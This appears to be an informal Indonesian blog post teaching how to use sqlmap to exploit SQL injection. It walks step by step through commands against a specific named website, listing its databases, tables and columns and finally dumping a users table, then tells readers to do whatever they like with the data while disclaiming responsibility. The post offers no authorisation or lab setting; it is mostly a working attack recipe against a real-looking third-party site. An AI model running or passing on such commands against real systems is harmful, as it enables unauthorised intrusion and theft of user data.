Akhirny kesampaian juga nulis artikel disini lagi
ok ok langsung aja kali ini gw mau sharing tentang cara penggunaan sqlmap. Sqlmap adalah salah satu tools pentest di linux backtrack yang kegunaanny untuk mengexploitasi web yang vulnerable terhadap serangan sql injection..:).
Buat maniak ubuntu juga bisa kok (tinggal download aja toolsnya). Oke langsung aja setelah lo dah dapet target yang vuln sql injection, ikuti langkah-langkah berikut:
1.buka sqlmap kalian
Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP
2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 --dbs
-u = url
--dbs = kita mencari nama databasenya...
3. Setelah ketemu nama databasenya yaitu="uselessj_uj2006"
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 --tables
-D = nama database yang sudah kita temukan tadi
--tables = untuk mencari nama table..
4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut...:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --columns
lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --dump
fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)
oke kalo udah gini terserah kalian mau diapakan..ane gak tanggung jawab yee..sekedar sharing aja buat pembelajaran
